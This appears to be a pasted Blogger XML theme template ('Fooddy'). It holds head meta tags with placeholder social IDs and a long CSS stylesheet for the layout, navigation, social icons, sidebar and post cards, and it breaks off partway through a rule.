· 6 years ago · Jan 06, 2020, 03:56 PM
1<?xml version="1.0" encoding="UTF-8" ?>
2<!DOCTYPE html>
3<html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
4 <head>
5 <meta content='width=device-width, initial-scale=1, maximum-scale=1' name='viewport'/>
6 <link href='http://fonts.googleapis.com/css?family=Open+Sans:400,400italic,700,700italic|PT+Sans:400,400i,700,700i|Shadows+Into+Light' media='all' rel='stylesheet' type='text/css'/>
7 <link href='//maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css' rel='stylesheet'/>
8 <b:include data='blog' name='all-head-content'/>
9 <title>
10 <b:if cond='data:blog.pageType == "index"'>
11 <data:blog.pageTitle/>
12 <b:else/>
13 <b:if cond='data:blog.pageType != "error_page"'>
14 <data:blog.pageName/> - <data:blog.title/>
15 <b:else/>
16 ERROR 404 - <data:blog.title/>
17 </b:if>
18 </b:if>
19 </title>
20 <!-- Description and Keywords (start) -->
21 <b:if cond='data:blog.pageType == "index"'>
22 <meta content='YOUR DESCRIPTION HERE' name='description'/>
23 </b:if>
24 <meta content='YOUR KEYWORDS HERE' name='keywords'/>
25 <!-- Description and Keywords (end) -->
26 <b:if cond='data:blog.pageType == "item"'>
27 <meta expr:content='data:blog.pageName' property='og:title'/>
28 <meta expr:content='data:blog.canonicalUrl' property='og:url'/>
29 <meta content='article' property='og:type'/>
30 </b:if>
31 <b:if cond='data:blog.postImageUrl'>
32 <meta expr:content='data:blog.postImageUrl' property='og:image'/>
33 <b:else/>
34 <b:if cond='data:blog.postImageThumbnailUrl'>
35 <meta expr:content='data:blog.postImageThumbnailUrl' property='og:image'/>
36 </b:if></b:if>
37 <b:if cond='data:blog.metaDescription != ""'>
38 <meta expr:content='data:blog.metaDescription' name='og:description'/>
39 </b:if>
40 <meta expr:content='data:blog.title' property='og:site_name'/>
41 <meta expr:content='data:blog.homepageUrl' name='twitter:domain'/>
42 <meta expr:content='data:blog.pageName' name='twitter:title'/>
43 <b:if cond='data:blog.postImageUrl'>
44 <meta content='summary_large_image' name='twitter:card'/>
45 <meta expr:content='data:blog.postImageUrl' name='twitter:image'/>
46 <b:else/>
47 <meta content='summary' name='twitter:card'/>
48 <b:if cond='data:blog.postImageThumbnailUrl'>
49 <meta expr:content='data:blog.postImageThumbnailUrl' name='twitter:image'/>
50 </b:if>
51 </b:if>
52 <meta expr:content='data:blog.pageName' name='twitter:title'/>
53 <b:if cond='data:blog.metaDescription'>
54 <meta expr:content='data:blog.metaDescription' name='twitter:description'/>
55 </b:if>
56 <!-- Social Media meta tag need customer customization -->
57 <meta content='Facebook App ID here' property='fb:app_id'/>
58 <meta content='Facebook Admin ID here' property='fb:admins'/>
59 <meta content='@username' name='twitter:site'/>
60 <meta content='@username' name='twitter:creator'/>
61 <b:skin><![CDATA[/*
62-----------------------------------------------
63Blogger Template Style
64Name: Fooddy
65Author : http://www.soratemplates.com
66License: Free Version
67----------------------------------------------- */
68/* Variable definitions
69-----------------------
70<Variable name="bodybackground" description="Background" type="background" color="#f6f7fb" default="$(color) url() repeat fixed top left" value="$(color) url() repeat fixed top left"/>
71<Variable name="maincolor" description="Primary Color" type="color" default="#ffbd2f" value="#ffbd2f"/>
72<Variable name="maindarkcolor" description="Primary Dark Color" type="color" default="#48494d" value="#48494d"/>
73-----------------------
74*/
75/*****************************************
76reset.css
77******************************************/
78html, body, .section, .widget, div, span, applet, object, iframe,
79h1, h2, h3, h4, h5, h6, p, blockquote, pre,
80a, abbr, acronym, address, big, cite, code,
81del, dfn, em, font, img, ins, kbd, q, s, samp,
82small, strike, strong, sub, sup, tt, var,
83dl, dt, dd, ol, ul, li,
84fieldset, form, label, legend,
85table, caption, tbody, tfoot, thead, tr, th, td, figure { margin: 0; padding: 0;}
86html { overflow-x: hidden;}
87a {text-decoration:none;color:#000;}
88article,aside,details,figcaption,figure,
89footer,header,hgroup,menu,nav,section { display:block;}
90table { border-collapse: separate; border-spacing: 0;}
91caption, th, td { text-align: left; font-weight: normal;}
92blockquote:before, blockquote:after,
93q:before, q:after { content: "";}
94.quickedit, .home-link{display:none;}
95blockquote, q { quotes: "" "";}
96sup{ vertical-align: super; font-size:smaller;}
97code{ font-family: 'Courier New', Courier, monospace; font-size:12px; color:#272727;}
98::selection {background:transparent; text-shadow:#000 0 0 2px;}
99::-moz-selection {background:transparent; text-shadow:#000 0 0 2px;}
100::-webkit-selection {background:transparent; text-shadow:#000 0 0 2px;}
101::-o-selection {background:transparent; text-shadow:#000 0 0 2px;}
102a img{ border: none;}
103ol, ul { padding:0; margin:0; text-align: left; }
104ol li { list-style-type: decimal; padding:0 0 5px; }
105ul li { list-style-type: disc; padding: 0 0 5px; }
106ul ul, ol ol { padding: 0; }
107#navbar-iframe, .navbar { height:0px; visibility:hidden; display:none }
108#HTML300, #Text100, .post-footer-line.post-footer-line-1, .post-footer-line.post-footer-line-2 , .post-footer-line.post-footer-line-3 {
109display: none;
110}
111.item-control {
112display: none !important;
113}
114h2.date-header, h4.date-header {display:none;margin:1.5em 0 .5em}
115h1, h2, h3, h4, h5, h6 {
116font-family:'PT Sans', sans-serif;
117font-weight: 400;
118color: #2e2e2e;
119}
120@media print{
121.top-bar, .navi-menu-wrap, #sidebar-wrapper, .share-box, .comments, #lower, .post-footer, #ads-blog-bottom, .bottom-bar-social {
122display: none!important;
123}
124.jugas_footer_copyright {
125 display: block!important;
126 text-align: center!important;
127}
128#main-wrapper {
129width:100%!important;
130max-width:100%!important;
131}
132}
133img {
134 max-width: 100%;
135 vertical-align: middle;
136}
137* {
138 outline: 0;
139 transition: all .3s ease;
140 -webkit-transition: all .3s ease;
141 -moz-transition: all .3s ease;
142 -o-transition: all .3s ease;
143}
144a:hover {
145color:$maincolor;
146}
147/*****************************************
148Custom css starts
149******************************************/
150body {
151color: #2e2e2e;
152font-family: 'Open Sans', sans-serif;
153font-size: 14px;
154font-weight: normal;
155line-height: 21px;
156background: $bodybackground;
157}
158/* ######## Wrapper Css ######################### */
159#outer-wrapper{max-width:100%;margin:0 auto;box-shadow:0 0 5px RGBA(0, 0, 0, 0.2)}
160.row{width:1150px}
161#content-wrapper {
162margin: 0 auto;
163padding: 20px 0 40px;
164overflow: hidden;
165}
166#main-wrapper {
167float: left;
168width: 68%;
169max-width: 800px;
170}
171#sidebar-wrapper {
172float: right;
173width: 30%;
174max-width: 330px;
175}
176/* ######## Top Header Bar Css ######################### */
177.top-bar {
178 border-top:3px solid $maincolor;
179background:#fff;
180}
181.top-bar-wrapper {
182position: relative;
183min-height:40px;
184color: #fff;
185margin:0 auto;
186}
187.top-bar-social, .bottom-bar-social {
188float: right;
189}
190.bottom-bar-social {
191padding:0 0;
192}
193.top-bar-social li, .bottom-bar-social li {
194display: inline;
195padding: 0;
196float: left;
197margin-right: 5px;
198;
199}
200.top-bar-social .widget ul, .bottom-bar-social .widget ul {
201padding: 0;
202}
203.top-bar-social .LinkList ul, .bottom-bar-social .LinkList ul {
204text-align: center;
205}
206.top-bar-social #social a {
207display: block;
208 width: 30px;
209 height: 30px;
210 line-height: 30px;
211 font-size: 12px;
212padding-bottom:10px;
213 color: #fff;
214position:relative;
215 background: $maincolor;
216 transition: background 0.3s linear;
217 -moz-transition: background 0.3s linear;
218 -webkit-transition: background 0.3s linear;
219 -o-transition: background 0.3s linear;
220}
221.top-bar-social #social a:after {
222 content: "";
223 position: absolute;
224 bottom: 0px;
225 left: 0;
226 width: 1px;
227 height: 1px;
228 border: 15px solid transparent;
229 border-bottom: 15px solid #fff;
230 z-index: 0;
231}
232.bottom-bar-social #social a {
233display: block;
234width: 30px;
235height: 30px;
236line-height: 30px;
237font-size: 15px;
238color: #fff;
239transition: color 0.3s linear;
240-moz-transition: color 0.3s linear;
241-webkit-transition: color 0.3s linear;
242-o-transition: color 0.3s linear;
243-webkit-border-radius: 100%;
244-moz-border-radius: 100%;
245border-radius: 100%;
246}
247.bottom-bar-social #social a.bloglovin{color:#ffbd2f}
248.bottom-bar-social #social a.facebook{color:#3b5998}
249.bottom-bar-social #social a.twitter{color:#00aced}
250.bottom-bar-social #social a.gplus{color:#df4b37}
251.bottom-bar-social #social a.rss{color:#f26522}
252.bottom-bar-social #social a.youtube{color:#cd201f}
253.bottom-bar-social #social a.skype{color:#00aff0}
254.bottom-bar-social #social a.stumbleupon{color:#eb4924}
255.bottom-bar-social #social a.tumblr{color:#35465c}
256.bottom-bar-social #social a.vine{color:#00b488}
257.bottom-bar-social #social a.stack-overflow{color:#f48024}
258.bottom-bar-social #social a.linkedin{color:#0077b5}
259.bottom-bar-social #social a.dribbble{color:#ea4c89}
260.bottom-bar-social #social a.soundcloud{color:#ff3300}
261.bottom-bar-social #social a.behance{color:#1769ff}
262.bottom-bar-social #social a.digg{color:#005be2}
263.bottom-bar-social #social a.instagram{color:#c13584}
264.bottom-bar-social #social a.pinterest{color:#bd081c}
265.bottom-bar-social #social a.delicious{color:#3399ff}
266.bottom-bar-social #social a.codepen{color:#47cf73}
267.top-bar-social #social a:before, .bottom-bar-social #social a:before {
268display: inline-block;
269font: normal normal normal 22px/1 FontAwesome;
270font-size: inherit;
271font-style: normal;
272font-weight: 400;
273-webkit-font-smoothing: antialiased;
274-moz-osx-font-smoothing: grayscale;
275}
276.top-bar-social .bloglovin:before, .bottom-bar-social .bloglovin:before{content:"\f004"}
277.top-bar-social .facebook:before, .bottom-bar-social .facebook:before{content:"\f09a"}
278.top-bar-social .twitter:before, .bottom-bar-social .twitter:before{content:"\f099"}
279.top-bar-social .gplus:before, .bottom-bar-social .gplus:before{content:"\f0d5"}
280.top-bar-social .rss:before, .bottom-bar-social .rss:before{content:"\f09e"}
281.top-bar-social .youtube:before, .bottom-bar-social .youtube:before{content:"\f167"}
282.top-bar-social .skype:before, .bottom-bar-social .skype:before{content:"\f17e"}
283.top-bar-social .stumbleupon:before, .bottom-bar-social .stumbleupon:before{content:"\f1a4"}
284.top-bar-social .tumblr:before, .bottom-bar-social .tumblr:before{content:"\f173"}
285.top-bar-social .vine:before, .bottom-bar-social .vine:before{content:"\f1ca"}
286.top-bar-social .stack-overflow:before, .bottom-bar-social .stack-overflow:before{content:"\f16c"}
287.top-bar-social .linkedin:before, .bottom-bar-social .linkedin:before{content:"\f0e1"}
288.top-bar-social .dribbble:before, .bottom-bar-social .dribbble:before{content:"\f17d"}
289.top-bar-social .soundcloud:before, .bottom-bar-social .soundcloud:before{content:"\f1be"}
290.top-bar-social .behance:before, .bottom-bar-social .behance:before{content:"\f1b4"}
291.top-bar-social .digg:before, .bottom-bar-social .digg:before{content:"\f1a6"}
292.top-bar-social .instagram:before, .bottom-bar-social .instagram:before{content:"\f16d"}
293.top-bar-social .pinterest:before, .bottom-bar-social .pinterest:before{content:"\f0d2"}
294.top-bar-social .delicious:before, .bottom-bar-social .delicious:before{content:"\f1a5"}
295.top-bar-social .codepen:before, .bottom-bar-social .codepen:before{content:"\f1cb"}
296.top-bar-social .email:before, .bottom-bar-social .email:before{content:"\f0e0"}
297
298.top-bar-social #social a.bloglovin:hover{background:$maincolor}
299.top-bar-social #social a.facebook:hover{background:#3b5998}
300.top-bar-social #social a.twitter:hover{background:#00aced}
301.top-bar-social #social a.gplus:hover{background:#df4b37}
302.top-bar-social #social a.rss:hover{background:#f26522}
303.top-bar-social #social a.youtube:hover{background:#cd201f}
304.top-bar-social #social a.skype:hover{background:#00aff0}
305.top-bar-social #social a.stumbleupon:hover{background:#eb4924}
306.top-bar-social #social a.tumblr:hover{background:#35465c}
307.top-bar-social #social a.vine:hover{background:#00b488}
308.top-bar-social #social a.stack-overflow:hover{background:#f48024}
309.top-bar-social #social a.linkedin:hover{background:#0077b5}
310.top-bar-social #social a.dribbble:hover{background:#ea4c89}
311.top-bar-social #social a.soundcloud:hover{background:#ff3300}
312.top-bar-social #social a.behance:hover{background:#1769ff}
313.top-bar-social #social a.digg:hover{background:#005be2}
314.top-bar-social #social a.instagram:hover{background:#c13584}
315.top-bar-social #social a.pinterest:hover{background:#bd081c}
316.top-bar-social #social a.delicious:hover{background:#3399ff}
317.top-bar-social #social a.codepen:hover{background:#47cf73}
318
319.top-bar-social ul#social a:hover {
320color: #fff;
321opacity: 1;
322}
323.bottom-bar-social ul#social a:hover {
324color: $maincolor;
325opacity: 1;
326}
327.top-bar-menu {
328float: left;
329 padding: 5px 0 0;
330}
331#searchform fieldset {
332 float: left;
333 color: #222;
334 border: 1px solid #eee;
335 -webkit-box-sizing: border-box;
336 -moz-box-sizing: border-box;
337 box-sizing: border-box;
338 background: #f6f6f6;
339 border-radius: 18px;
340}
341#searchform {
342 margin: 0px;
343 display: inline-block;
344}
345#searchform fieldset:hover {
346 border: 1px solid #ccc;
347}
348#s {
349 float: left;
350 color: #888;
351 background: none;
352 border-width: 0 1px 0 0;
353 border-weight: solid;
354 border-color: #ccc;
355 margin: 6px 0;
356 padding: 0 8px;
357}
358#searchform .sbutton {
359 cursor: pointer;
360 padding: 6px 8px;
361 float: right;
362}
363#s:active, #s:focus {
364 border: none;
365 outline: none;
366 box-shadow: none;
367}
368.selectnav {display:none}
369/* ######## Header Css ######################### */
370#header-wrapper {
371background: #fff;
372 box-shadow: 0 1px 3px rgba(0,0,0,0.055);
373text-align:center;
374}
375#header-wrappers {
376color: $maindarkcolor;
377padding: 20px 0 20px;
378margin: 0 auto;
379}
380#header-inner {
381background-position: left;
382background-repeat: no;
383}
384.headerleft img {
385height: auto;
386margin: 0 0 0;
387}
388.headerleft h1,
389.headerleft h1 a,
390.headerleft h1 a:hover,
391.headerleft h1 a:visited {
392 font-family: 'Shadows Into Light', cursive;
393 color: #222222;
394 font-size: 55px;
395 font-weight: bold;
396 line-height: 68px;
397 margin: 0;
398 padding: 0 0 5px;
399 text-decoration: none;
400 text-transform: uppercase;
401}
402.headerleft h3 {
403font-weight: 400;
404margin: 0;
405padding: 0;
406}
407.headerleft .description {
408color: #000000;
409 font: normal 14px 'PT Sans', sans-serif;
410 margin: 0;
411 padding: 10px 0;
412 text-transform: uppercase;
413 text-align: left;
414}
415.headerleft {
416margin: 0;
417padding: 0;
418display:inline-block;
419}
420/* ######## Navigation Menu Css ######################### */
421
422.navi-menu-wrap {
423border-top:1px solid #efefef;
424}
425
426.navi-menu {
427text-align: center;
428margin: 0 auto;
429padding: 0;
430margin:0 auto;
431position:relative;
432text-align:center;
433}
434.selectnav {
435display:none;
436}
437
438ul#nav {
439 list-style: none;
440 margin: 0;
441 padding: 0;
442text-align:center;
443}
444#menu .widget {
445 display: none;
446}
447#menu {
448 height: 50px;
449 position: relative;
450 text-align: center;
451 z-index: 15;
452}
453.menu-wrap {
454margin:0 auto;
455position: relative;
456}
457#menu ul > li {
458 position: relative;
459 vertical-align: middle;
460 display: inline-block;
461 padding: 0;
462 margin: 0;
463}
464#menu ul > li:hover > a {
465
466}
467#menu ul > li > a {
468 color: #48494d;
469 font-size: 14px;
470 font-weight: 600;
471 line-height: 50px;
472 display: inline-block;
473 text-transform: uppercase;
474 text-decoration: none;
475 letter-spacing: 1px;
476 margin: 0;
477 padding: 0 12px;
478 font-family: 'PT Sans', sans-serif;
479}
480
481#menu ul > li > ul > li:first-child > a {
482 padding-left: 12px
483}
484#menu ul > li > ul {
485 position: absolute;
486 background: #fff;
487 top: 100%;
488 left: 0;
489 min-width: 180px;
490 padding: 0;
491 z-index: 99;
492 margin-top: 0;
493 visibility: hidden;
494 opacity: 0;
495 -webkit-transform: translateY(10px);
496 -moz-transform: translateY(10px);
497 transform: translateY(10px)
498}
499#menu ul > li > ul > li > ul {
500 position: absolute;
501 top: 0;
502 left: 180px;
503 width: 180px;
504 background: #fff;
505 z-index: 99;
506 margin-top: 0;
507 margin-left: 0;
508 padding: 0;
509 border-left: 1px solid #efefef;
510 visibility: hidden;
511 opacity: 0;
512 -webkit-transform: translateY(10px);
513 -moz-transform: translateY(10px);
514 transform: translateY(10px)
515}
516#menu ul > li > ul > li {
517 display: block;
518 float: none;
519 text-align: left;
520 position: relative;
521border-bottom: 1px solid;
522 border-top: none;
523 border-color: #efefef;
524}
525#menu ul > li > ul > li:last-child {
526 border: 0;
527}
528#menu ul li:after {
529 content: "|";
530 display: block;
531 position: absolute;
532 margin: auto;
533 top: -20px;
534 right: -5px;
535 bottom: 0;
536 width: 8px;
537 height: 8px;
538 text-align: center;
539 font-weight: 400;
540 font-size: 20px;
541 text-rendering: auto;
542 -webkit-font-smoothing: antialiased;
543 -moz-osx-font-smoothing: grayscale;
544 color: #efefef;
545}
546#menu ul li.parent ul li:after, #menu ul li:last-child:after {
547 display:none;
548}
549#menu ul > li:hover a {
550 color: $maincolor
551}
552#menu ul > li:hover li a {
553 color: #48494d
554}
555
556#menu ul > li > ul > li a {
557 font-size: 11px;
558 display: block;
559 color: #fff;
560 line-height: 35px;
561 text-transform: uppercase;
562 text-decoration: none;
563 margin: 0;
564 padding: 0 12px;
565 border-right: 0;
566 border: 0
567}
568#menu ul > li.parent > a:after {
569 content: '\f107';
570 font-family: FontAwesome;
571 float: right;
572 margin-left: 5px
573}
574#menu ul > li:hover > ul,
575#menu ul > li > ul > li:hover > ul {
576 opacity: 1;
577 visibility: visible;
578 -webkit-transform: translateY(0);
579 -moz-transform: translateY(0);
580 transform: translateY(0)
581}
582#menu ul > li > ul > li.parent > a:after {
583 content: '\f105';
584 float: right
585}
586#menu ul ul {
587
588}
589/* ######## Featured Widget Css ######################### */
590.tyard-wrapper {
591 margin: 10px auto 0;
592}
593.preload {
594opacity:0;
595}
596.comload {
597opacity:1;
598}
599.tyard .ty-first {
600 width: 60%;
601 position: relative;
602 float: left;
603 padding-right: 1.4%;
604 box-sizing: border-box;
605 overflow: hidden;
606}
607.tyard .ty-feat-image {
608 width: 100%;
609 position: relative;
610 overflow: hidden;
611}
612.tyard .ty-first .tyard-thumb, .tyard .ty-img {
613 height: 450px;
614}
615.templatesyard .ty-first .tyard-thumb {
616 position: relative;
617 width: 100%;
618 height: 225px;
619}
620.tyard-thumb {
621 overflow: hidden;
622}
623.tyard .ty-first .tyard-thumb, .tyard .ty-img {
624 height: 450px;
625border-radius: 5px;
626}
627.templatesyard .ty-img {
628 width: 100%;
629 height: 450px;
630 position: relative;
631 display: block;
632border-radius: 5px;
633}
634.ty-first .ty-img:after {
635 content: no-close-quote;
636 position: absolute;
637 left: 0;
638 bottom: 0;
639 width: 100%;
640 height: 200px;
641 background: rgba(0,0,0,0) linear-gradient(to bottom, transparent 0%,transparent 0%,rgba(0,0,0,0.5) 100%,rgba(0,0,0,0.1) 100%) repeat scroll 0 0;
642}
643.templatesyard .ty-feat .ty-rest .yard-img:after {
644 content: no-close-quote;
645 position: absolute;
646 left: 0;
647 bottom: 0;
648 width: 100%;
649 height: 150px;
650 background: rgba(0,0,0,0) linear-gradient(to bottom, transparent 0%,transparent 0%,rgba(0,0,0,0.5) 100%,rgba(0,0,0,0.1) 100%) repeat scroll 0 0;
651}
652.tyard-thumb .yard-label {
653 position: absolute;
654 top: 15px;
655 left: 15px;
656 z-index: 2;
657}
658.tyard-thumb .yard-label a {
659 background: #fff;
660 color: #f25c2c;
661 text-transform: uppercase;
662 height: 20px;
663 line-height: 20px;
664 display: inline-block;
665 padding: 0 6px;
666 font-size: 11px;
667 font-weight: 400;
668 border-radius: 2px;
669}
670.tyard .ty-first .ty-con-yard, .column .ty-first .ty-con-yard {
671 position: absolute;
672 bottom: 0;
673 width: 100%;
674 z-index: 2;
675 padding: 15px;
676 box-sizing: border-box;
677}
678.tyard .ty-first .ty-con-yard .tyard-title a, .column .ty-first .ty-con-yard .tyard-title a {
679 display: block;
680 font-size: 28px;
681 color: #fff;
682 font-weight: 400;
683 line-height: 30px;
684 margin-bottom: 5px;
685}
686.ty-con-yard .yard-auth-ty, .ty-con-yard .ty-time {
687 color: #ccc;
688}
689.recent-summary {
690 display: block;
691 color: #ccc;
692 padding: 10px 0;
693}
694.tyard .ty-feat .ty-rest {
695 overflow: hidden;
696 display: block;
697 padding: 0;
698 position: relative;
699}
700.tyard .ty-feat .ty-rest:last-child {
701 margin-top: 10px;
702}
703.templatesyard .ty-feat .ty-rest .tyard-thumb {
704 width: 100%;
705 height: 220px;
706 vertical-align: middle;
707border-radius: 5px;
708}
709.templatesyard .ty-feat .ty-rest .yard-img {
710 width: 100%;
711 height: 220px;
712 position: relative;
713 display: block;
714}
715.tyimg-lay {
716 position: absolute;
717 left: 0;
718 top: 0;
719 z-index: 1;
720 width: 100%;
721 height: 100%;
722 background-color: rgba(40,35,40,0.05);
723}
724.templatesyard .ty-feat .ty-rest .yard-tent-ty {
725 position: absolute;
726 bottom: 0;
727 width: 100%;
728 z-index: 2;
729 padding: 15px;
730 box-sizing: border-box;
731}
732.tyard .ty-rest .yard-tent-ty .tyard-title {
733 overflow: hidden;
734 line-height: 0;
735 margin: 0 0 2px;
736 padding: 0;
737}
738.tyard .ty-rest .yard-tent-ty .tyard-title a {
739 color: #fff;
740 font-weight: 400;
741 font-size: 24px;
742 line-height: 1.5em;
743}
744.yard-auth-ty {
745 margin-right: 10px;
746}
747.yard-auth-ty, .ty-time {
748 color: #bdbdbd;
749 font-size: 12px;
750 font-weight: 400;
751}
752.ty-con-yard .yard-auth-ty, .ty-con-yard .ty-time {
753 color: #ccc;
754}
755.yard-auth-ty::before {
756 content: '\f007';
757 font-family: fontawesome;
758 color: #bbb;
759 margin-right: 5px;
760}
761.ty-time:before {
762 content: '\f133';
763 font-family: fontawesome;
764 color: #bbb;
765 margin-right: 5px;
766}
767/* ######## Sidebar Css ######################### */
768.sidebar .widget, .mini-sidebar .widget {
769margin-bottom: 20px;
770 padding: 10px 20px 20px;
771position: relative;
772clear: both;
773background: #FFF;
774 border-radius: 5px;
775 box-shadow: 0 1px 3px rgba(0,0,0,0.13);
776box-sizing: border-box;
777}
778.sidebar h2 {
779 color: #48494d;
780 font-size: 16px;
781 padding: 8px 0;
782 margin: 0 0 20px;
783 font-weight: 700;
784 letter-spacing: 1.5px;
785 text-transform: capitalize;
786 position: relative;
787 text-align: left;
788border-bottom: 1px solid #efefef;
789}
790.sidebar ul,.sidebar li, .mini-sidebar ul,.mini-sidebar li {
791list-style-type:none;
792margin:0;
793padding: 0;
794}
795.sidebar .LinkList li, .mini-sidebar .LinkList li {
796padding: 0 0 6px 0;
797 margin: 0 0 6px 0;
798text-transform:capitalize;
799}
800/* Multi Tab Widget */
801.sidetabs {
802 margin-bottom: 20px;
803 padding: 10px 20px 20px;
804 position: relative;
805 clear: both;
806 background: #FFF;
807 border-radius: 5px;
808 box-shadow: 0 1px 3px rgba(0,0,0,0.13);
809 box-sizing: border-box;
810}
811.sidetabs .section .widget {
812 margin-bottom: 0;
813 padding: 0;
814 border-radius: 0;
815 box-shadow: none;
816}
817.menu-tab li a,
818.sidetabs .section {
819transition: all 0s ease;
820-webkit-transition: all 0s ease;
821-moz-transition: all 0s ease;
822-o-transition: all 0s ease;
823-ms-transition: all 0s ease
824}
825.menu-tab {
826overflow: hidden;
827clear: both;
828padding: 0;
829margin: 0;
830border-bottom: 1px solid #efefef;
831}
832.sidetabs .widget-content {
833 padding: 10px 0;
834}
835.sidetabs .widget h2 {
836display: none
837}
838.menu-tab li {
839width: 50%;
840float: left;
841display: inline-block;
842padding: 0;
843 box-sizing: border-box;
844}
845.menu-tab li:first-child a {
846border-right: 1px solid #efefef;
847}
848.menu-tab li a {
849 font-family: 'PT Sans', sans-serif;
850height: 32px;
851text-align: center;
852padding: 0;
853font-weight: 700;
854display: block;
855color: #48494d;
856font-size: 14px;
857line-height: 32px;
858letter-spacing: 1.5px;
859text-transform: capitalize
860}
861.menu-tab li.active a {
862color: #fff;
863color:$maincolor;
864}
865.menu-tab li {
866display: none
867}
868.hide-tab {
869display: inline-block!important
870}
871#tabside2 {
872 margin-bottom: 15px;
873}
874/* ######## Post Css ######################### */
875article {
876 padding: 0;
877 overflow: hidden;
878}
879
880.post-outer {
881 padding: 0;
882}
883.index .post-outer, .archive .post-outer {
884 padding-right: 2%;
885 padding-left: 0;
886 box-sizing: border-box;
887 width: 50%;
888 float: left;
889 margin-bottom: 30px;
890}
891.index .post-outer:nth-child(2n), .archive .post-outer:nth-child(2n) {
892 padding-left: 2%;
893 padding-right: 0;
894}
895.post {
896 text-align: left;
897 display: block;
898 height: auto;
899 overflow: hidden;
900 box-sizing: border-box;
901 border-radius: 5px;
902 padding: 30px 30px 20px;
903 background: #FFF;
904 box-shadow: 5px 5px 45px -27px rgba(0,0,0,0.5);
905 -webkit-box-shadow: 5px 5px 55px -27px rgba(0,0,0,0.5);
906 -moz-box-shadow: 5px 5px 45px -27px rgba(0,0,0,0.5);
907}
908
909
910.post h2 {
911margin-top: 15px;
912margin-bottom: 12px;
913 padding: 0;
914line-height: 24px;
915 font-size: 16px;
916letter-spacing: 0.8px;
917 font-weight: 700;
918}
919.post h2 a {
920color: #48494d;
921}
922
923
924.retitle h2 {
925 display: block;
926}
927.post-body {
928margin: 0px;
929padding:10px;
930font-size: 14px;
931line-height: 26px;
932 box-sizing: border-box;
933}
934.post-body a {
935 margin-left: 0 !important;
936 margin-right: 0 !important;
937}
938.index .post-labels, .archive .post-labels {
939position: absolute;
940top: 10px;
941left: 10px;
942padding:5px 20px 7px;
943background: #fff;
944font-size: 12px;
945text-transform: capitalize;
946display: inline-block;
947z-index: 9;
948border-radius: 30px;
949opacity: 1;
950 visibility: visible;
951 -webkit-transform: translateX(0);
952 -moz-transform: translateX(0);
953 transform: translateX(0);
954}
955.index .post-labels a, .archive .post-labels a {
956 color: #f25c2c;
957}
958.block-image {
959float: none;
960width: 100%;
961height: auto;
962margin: 0 auto;
963position:relative;
964}
965.block-image .thumb {
966width: 100%;
967height: auto;
968position: relative;
969display: block;
970overflow: hidden;
971}
972.block-image .thumb a {
973width: 100%;
974height: 220px;
975display: block;
976border-radius: 5px;
977transition: all .3s ease-out!important;
978-webkit-transition: all .3s ease-out!important;
979-moz-transition: all .3s ease-out!important;
980-o-transition: all .3s ease-out!important;
981}
982.block-image .thumb > a:before {
983 position: absolute;
984 content: '';
985 width: 100%;
986 height: 100%;
987 background-color: $maindarkcolor;
988 opacity: 0;
989 left: 0;
990 top: 0;
991 -webkit-transition: all 0.35s ease-in-out;
992 -moz-transition: all 0.35s ease-in-out;
993 -ms-transition: all 0.35s ease-in-out;
994 -o-transition: all 0.35s ease-in-out;
995 transition: all 0.35s ease-in-out;
996}
997.block-image .thumb:hover > a:before {
998 opacity: 0.3;
999}
1000.block-image .meta-botom {
1001 position: absolute;
1002 top: 10px;
1003 left: 10px;
1004 border: 0;
1005 padding: 0;
1006 visibility: hidden;
1007opacity: 0;
1008 -webkit-transform: translateX(-40px);
1009 -moz-transform: translateX(-40px);
1010 transform: translateX(-40px);
1011}
1012.block-image:hover .meta-botom {
1013 opacity: 1;
1014 visibility: visible;
1015 -webkit-transform: translateX(0);
1016 -moz-transform: translateX(0);
1017 transform: translateX(0);
1018}
1019.index .block-image:hover .post-labels, .archive .block-image:hover .post-labels {
1020 opacity: 0;
1021 visibility: hidden;
1022 -webkit-transform: translateX(-40px);
1023 -moz-transform: translateX(-40px);
1024 transform: translateX(-40px);
1025}
1026.block-image .meta-botom .share-art {
1027position: relative;
1028}
1029
1030.block-image .meta-botom .share-art span {
1031display: none;
1032}
1033.block-image .meta-botom .share-art {
1034float: right;
1035padding: 0;
1036padding-top: 0;
1037font-size: 14px;
1038font-weight: 400;
1039text-transform: capitalize;
1040}
1041.block-image .meta-botom .share-art a {
1042color: #fff;
1043padding: 5px 10px;
1044margin-left: 4px;
1045border-radius: 2px;
1046display: inline-block;
1047margin-right: 0;
1048height: auto;
1049 width: auto;
1050}
1051.block-image .meta-botom .share-art .fac-art {
1052background-color: #003471;
1053}
1054.block-image .meta-botom .share-art .twi-art {
1055background-color: #00BFF3;
1056}
1057.block-image .meta-botom .share-art .goo-art {
1058background-color: #EA4D29;
1059}
1060.block-image .meta-botom .share-art i {color:#fff;}
1061.block-image .meta-botom .share-art a:hover i{opacity:0.7;}
1062.date-header-post {
1063 color: #bdbdbd;
1064 display: block;
1065 font-size: 12px;
1066 font-weight: 400;
1067 line-height: 1.3em;
1068 margin: 0!important;
1069 padding: 0;
1070}
1071.date-header-post a {
1072 color: #bdbdbd;
1073}
1074.post-header {
1075 padding:0 10px 10px;
1076}
1077.index .post-header, .archive .post-header {
1078padding:0;
1079}
1080#meta-post abbr.published.timeago {
1081 margin-right: 8px;
1082margin-left:2px;
1083}
1084abbr.published.timeago {
1085text-decoration:none;
1086}
1087.post-meta {
1088 color: #bdbdbd;
1089 display: block;
1090 font-size: 13px;
1091 font-weight: 400;
1092 line-height: 21px;
1093 margin: 0;
1094 padding: 0;
1095}
1096.post-meta a {
1097 color: #CBCBCB;
1098}
1099 .post-meta i {
1100 color: $maindarkcolor;
1101}
1102.post-timestamp {
1103 margin-left: 5px;
1104}
1105.label-head {
1106 margin-left: 5px;
1107}
1108.label-head a {
1109 padding-left: 2px;
1110}
1111.resumo {
1112 margin-top: 10px;
1113 color: #343434;
1114}
1115.resumo span {
1116 display: block;
1117 margin-bottom: 8px;
1118font-size: 14px;
1119 line-height: 22px;
1120text-align: justify;
1121}
1122.post-body img {
1123max-width: 100%;
1124padding: 10px 0;
1125position: relative;
1126margin:0 auto;
1127}
1128.post h3 {
1129font-size: 18px;
1130margin-top: 20px;
1131margin-bottom: 10px;
1132line-height: 1.1;
1133}
1134.second-meta {
1135padding:10px 0 0;
1136display: block;
1137overflow: hidden;
1138}
1139.second-meta .read-more-wrap {
